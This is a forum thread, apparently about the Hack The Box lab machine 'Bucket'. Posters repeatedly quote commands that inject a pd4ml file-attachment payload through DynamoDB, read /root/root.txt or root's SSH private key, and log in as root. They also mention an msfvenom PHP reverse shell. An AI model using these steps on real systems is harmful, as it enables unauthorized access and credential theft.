TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#61
You can replace /root/root.txt with /root/.ssh/id_rsa to get ssh private key..
#62
(October 20, 2020 at 12:58 PM)Kali76 Wrote:
(October 20, 2020 at 05:58 AM)southerndarkness Wrote: finally rooted.
tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]


create table:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb


create item:
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb


trigger pd4ml generation:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string

thanks Bro i got root.txt, how do a got a shell of root? I can inject my id_rsa.pub in authorized_keys?

Dump the root ssh key, read the pdf, copy the key and write it to a file locally, chmod 600 and ssh -i as root
#63
i get user + help for root
--------------------------------------------------
[email protected]:~$ aws dynamodb create-table \
> --table-name alerts \
> --attribute-definitions \
> AttributeName=title,AttributeType=S \
> --key-schema \
> AttributeName=title,KeyType=HASH \
> --provisioned-throughput \
> ReadCapacityUnits=10,WriteCapacityUnits=5 \
> --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
#64
(October 20, 2020 at 09:42 PM)southerndarkness Wrote:
(October 20, 2020 at 12:58 PM)Kali76 Wrote:
(October 20, 2020 at 05:58 AM)southerndarkness Wrote: finally rooted.
tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]


create table:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb

how get


create item:
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb


trigger pd4ml generation:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string

thanks Bro i got root.txt, how do a got a shell of root? I can inject my id_rsa.pub in authorized_keys?

Dump the root ssh key, read the pdf, copy the key and write it to a file locally, chmod 600 and ssh -i as root

************************
[email protected]:~$ aws dynamodb create-table \
--table-name alerts \
--attribute-definitions \
AttributeName=title,AttributeType=S \
--key-schema \
AttributeName=title,KeyType=HASH \
--provisioned-throughput \
ReadCapacityUnits=10,WriteCapacityUnits=5 \
--endpoint-url=http://s3.bucket.htbaws dynamodb create-table \
> --table-name alerts \
> --attribute-definitions \
> AttributeName=title,AttributeType=S \
> --key-schema \
> AttributeName=title,KeyType=HASH \
> --provisioned-throughput \
> ReadCapacityUnits=10,WriteCapacityUnits=5 \
>
--endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ aws dynamodb put-item \
--table-name alerts \
--item \
'{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
--endpoint-url=http://s3.bucket.htbaws dynamodb put-item \
> --table-name alerts \
> --item \
<in\">file:///root/root.txt</pd4ml:attachment>"}}' \
>
--endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 127.0.0.1:8000...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:8000
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 21 Oct 2020 16:17:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
***************************

how get file result.pdf`

[email protected]:~$ cat /var/www/bucket-app/files/result.pdf
cat /var/www/bucket-app/files/result.pdf
cat: /var/www/bucket-app/files/result.pdf: No such file or directory
i don' t where problem
************Hellp me *******************
#65
(October 21, 2020 at 05:24 PM)cypherdz23 Wrote:
(October 20, 2020 at 09:42 PM)southerndarkness Wrote:
(October 20, 2020 at 12:58 PM)Kali76 Wrote:
(October 20, 2020 at 05:58 AM)southerndarkness Wrote: finally rooted.
tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]


create table:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb

how get


create item:
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb


trigger pd4ml generation:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string

thanks Bro i got root.txt, how do a got a shell of root? I can inject my id_rsa.pub in authorized_keys?

Dump the root ssh key, read the pdf, copy the key and write it to a file locally, chmod 600 and ssh -i as root

************************
[email protected]:~$ aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htbaws dynamodb create-table \
>    --table-name alerts \
>    --attribute-definitions \
>        AttributeName=title,AttributeType=S \
>    --key-schema \
>        AttributeName=title,KeyType=HASH \
> --provisioned-throughput \
>        ReadCapacityUnits=10,WriteCapacityUnits=5 \
>
        --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htbaws dynamodb put-item \
> --table-name alerts  \
> --item \
<in\">file:///root/root.txt</pd4ml:attachment>"}}' \
>
    --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*  Trying 127.0.0.1:8000...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:8000
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 21 Oct 2020 16:17:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
***************************

how get file result.pdf`

[email protected]:~$  cat /var/www/bucket-app/files/result.pdf
cat /var/www/bucket-app/files/result.pdf
cat: /var/www/bucket-app/files/result.pdf: No such file or directory
i don' t where problem
************Hellp me *******************

You need to run first and second command from your system (not from bucket)
#66
(October 21, 2020 at 05:24 PM)cypherdz23 Wrote:
(October 20, 2020 at 09:42 PM)southerndarkness Wrote:
(October 20, 2020 at 12:58 PM)Kali76 Wrote:
(October 20, 2020 at 05:58 AM)southerndarkness Wrote: finally rooted.
tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]


create table:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb

how get


create item:
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb


trigger pd4ml generation:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string

thanks Bro i got root.txt, how do a got a shell of root? I can inject my id_rsa.pub in authorized_keys?

Dump the root ssh key, read the pdf, copy the key and write it to a file locally, chmod 600 and ssh -i as root

************************
[email protected]:~$ aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htbaws dynamodb create-table \
>    --table-name alerts \
>    --attribute-definitions \
>        AttributeName=title,AttributeType=S \
>    --key-schema \
>        AttributeName=title,KeyType=HASH \
> --provisioned-throughput \
>        ReadCapacityUnits=10,WriteCapacityUnits=5 \
>
        --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htbaws dynamodb put-item \
> --table-name alerts  \
> --item \
<in\">file:///root/root.txt</pd4ml:attachment>"}}' \
>
    --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*  Trying 127.0.0.1:8000...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:8000
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 21 Oct 2020 16:17:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
***************************

how get file result.pdf`

[email protected]:~$  cat /var/www/bucket-app/files/result.pdf
cat /var/www/bucket-app/files/result.pdf
cat: /var/www/bucket-app/files/result.pdf: No such file or directory
i don' t where problem
************Hellp me *******************

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
Make sure the subdomain is in your /etc/hosts
#67
(October 22, 2020 at 06:42 PM)seminartestik Wrote:
(October 21, 2020 at 05:24 PM)cypherdz23 Wrote:
(October 20, 2020 at 09:42 PM)southerndarkness Wrote:
(October 20, 2020 at 12:58 PM)Kali76 Wrote:
(October 20, 2020 at 05:58 AM)southerndarkness Wrote: finally rooted.
tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]


create table:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb

how get


create item:
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb


trigger pd4ml generation:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string

thanks Bro i got root.txt, how do a got a shell of root? I can inject my id_rsa.pub in authorized_keys?

Dump the root ssh key, read the pdf, copy the key and write it to a file locally, chmod 600 and ssh -i as root

************************
[email protected]:~$ aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htbaws dynamodb create-table \
>    --table-name alerts \
>    --attribute-definitions \
>        AttributeName=title,AttributeType=S \
>    --key-schema \
>        AttributeName=title,KeyType=HASH \
> --provisioned-throughput \
>        ReadCapacityUnits=10,WriteCapacityUnits=5 \
>
        --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htbaws dynamodb put-item \
> --table-name alerts  \
> --item \
<in\">file:///root/root.txt</pd4ml:attachment>"}}' \
>
    --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*  Trying 127.0.0.1:8000...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:8000
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 21 Oct 2020 16:17:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
***************************

how get file result.pdf`

[email protected]:~$  cat /var/www/bucket-app/files/result.pdf
cat /var/www/bucket-app/files/result.pdf
cat: /var/www/bucket-app/files/result.pdf: No such file or directory
i don' t where problem
************Hellp me *******************

You need to run first and second command from your system (not from bucket)

I did the first and second command from my system but the result.php still isnt showing up
#68
(October 23, 2020 at 04:27 AM)Predxtor Wrote:
(October 22, 2020 at 06:42 PM)seminartestik Wrote:
(October 21, 2020 at 05:24 PM)cypherdz23 Wrote:
(October 20, 2020 at 09:42 PM)southerndarkness Wrote:
(October 20, 2020 at 12:58 PM)Kali76 Wrote: thanks Bro i got root.txt, how do a got a shell of root? I can inject my id_rsa.pub in authorized_keys?

Dump the root ssh key, read the pdf, copy the key and write it to a file locally, chmod 600 and ssh -i as root

************************
[email protected]:~$ aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htbaws dynamodb create-table \
>    --table-name alerts \
>    --attribute-definitions \
>        AttributeName=title,AttributeType=S \
>    --key-schema \
>        AttributeName=title,KeyType=HASH \
> --provisioned-throughput \
>        ReadCapacityUnits=10,WriteCapacityUnits=5 \
>
        --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htbaws dynamodb put-item \
> --table-name alerts  \
> --item \
<in\">file:///root/root.txt</pd4ml:attachment>"}}' \
>
    --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*  Trying 127.0.0.1:8000...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:8000
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 21 Oct 2020 16:17:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
***************************

how get file result.pdf`

[email protected]:~$  cat /var/www/bucket-app/files/result.pdf
cat /var/www/bucket-app/files/result.pdf
cat: /var/www/bucket-app/files/result.pdf: No such file or directory
i don' t where problem
************Hellp me *******************

You need to run first and second command from your system (not from bucket)

I did the first and second command from my system but the result.php still isnt showing up

you need to 
0. ssh tunnel port 8000
1. create the alerts table
2. add ransomware item with pd4ml attachment data string to the table
3. curl to POST to the url
4. check for the pdf

Theres some sort of cron/cleaning mechanism. I found that after grabbing what I needed, the files/ directory would be empty ~20 seconds later
#69
(October 23, 2020 at 04:31 AM)southerndarkness Wrote:
(October 23, 2020 at 04:27 AM)Predxtor Wrote:
(October 22, 2020 at 06:42 PM)seminartestik Wrote:
(October 21, 2020 at 05:24 PM)cypherdz23 Wrote:
(October 20, 2020 at 09:42 PM)southerndarkness Wrote: Dump the root ssh key, read the pdf, copy the key and write it to a file locally, chmod 600 and ssh -i as root

************************
[email protected]:~$ aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htbaws dynamodb create-table \
>    --table-name alerts \
>    --attribute-definitions \
>        AttributeName=title,AttributeType=S \
>    --key-schema \
>        AttributeName=title,KeyType=HASH \
> --provisioned-throughput \
>        ReadCapacityUnits=10,WriteCapacityUnits=5 \
>
        --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htbaws dynamodb put-item \
> --table-name alerts  \
> --item \
<in\">file:///root/root.txt</pd4ml:attachment>"}}' \
>
    --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*  Trying 127.0.0.1:8000...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:8000
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 21 Oct 2020 16:17:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
***************************

how get file result.pdf`

[email protected]:~$  cat /var/www/bucket-app/files/result.pdf
cat /var/www/bucket-app/files/result.pdf
cat: /var/www/bucket-app/files/result.pdf: No such file or directory
i don' t where problem
************Hellp me *******************

You need to run first and second command from your system (not from bucket)

I did the first and second command from my system but the result.php still isnt showing up

you need to 
0. ssh tunnel port 8000
1. create the alerts table
2. add ransomware item with pd4ml attachment data string to the table
3. curl to POST to the url
4. check for the pdf

Theres some sort of cron/cleaning mechanism. I found that after grabbing what I needed, the files/ directory would be empty ~20 seconds later
***********************************************************************************************
i get file format pdf when you open file empty page
how can use it plz help me
#70
(October 23, 2020 at 06:26 PM)cypherdz23 Wrote:
(October 23, 2020 at 04:31 AM)southerndarkness Wrote:
(October 23, 2020 at 04:27 AM)Predxtor Wrote:
(October 22, 2020 at 06:42 PM)seminartestik Wrote:
(October 21, 2020 at 05:24 PM)cypherdz23 Wrote: ************************
[email protected]:~$ aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htbaws dynamodb create-table \
>    --table-name alerts \
>    --attribute-definitions \
>        AttributeName=title,AttributeType=S \
>    --key-schema \
>        AttributeName=title,KeyType=HASH \
> --provisioned-throughput \
>        ReadCapacityUnits=10,WriteCapacityUnits=5 \
>
        --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htbaws dynamodb put-item \
> --table-name alerts  \
> --item \
<in\">file:///root/root.txt</pd4ml:attachment>"}}' \
>
    --endpoint-url=http://s3.bucket.htb

Could not connect to the endpoint URL: "http://s3.bucket.htb/"
[email protected]:~$ curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*  Trying 127.0.0.1:8000...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:8000
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 21 Oct 2020 16:17:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
***************************

how get file result.pdf`

[email protected]:~$  cat /var/www/bucket-app/files/result.pdf
cat /var/www/bucket-app/files/result.pdf
cat: /var/www/bucket-app/files/result.pdf: No such file or directory
i don' t where problem
************Hellp me *******************

You need to run first and second command from your system (not from bucket)

I did the first and second command from my system but the result.php still isnt showing up

you need to 
0. ssh tunnel port 8000
1. create the alerts table
2. add ransomware item with pd4ml attachment data string to the table
3. curl to POST to the url
4. check for the pdf

Theres some sort of cron/cleaning mechanism. I found that after grabbing what I needed, the files/ directory would be empty ~20 seconds later
***********************************************************************************************
i get file format pdf when you open file empty page
how can use it plz help me

If just cat the file while on the box you should see the content.
#71
How did you installed the aws on your system? I am in struggle with it. It wants credentials.. :/
//I was just blind, sorry guys
#72
(October 18, 2020 at 04:35 PM)xxxyz Wrote: When you upload your file in the bucket adserver you need to wait the sync part. When the file in the bucket is out then you can check on the real server bucket.htb/....php

There is a sync feature you just need to wait and check.

Thanks for info

Have you a specific msfvenom command to create the php reverse shell?
I've obtained the shell properly but when i try to create a tty with spawn (python3 -c 'import pty; pty.spawn("/bin/bash");), unfortunately nothing is realized.
Have you any idea?

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Static Machine Discussion zomalto 183 17,590 3 hours ago
Last Post: nido
TUTORIAL HTB dynstr [DISCUSSION] internet dreams 87 15,730 Yesterday at 05:32 PM
Last Post: binbash
TUTORIAL HTB Static [Discussion] pheonix2021 9 1,659 Yesterday at 04:00 AM
Last Post: cyber_punk123

 Users browsing this thread: 1 Guest(s)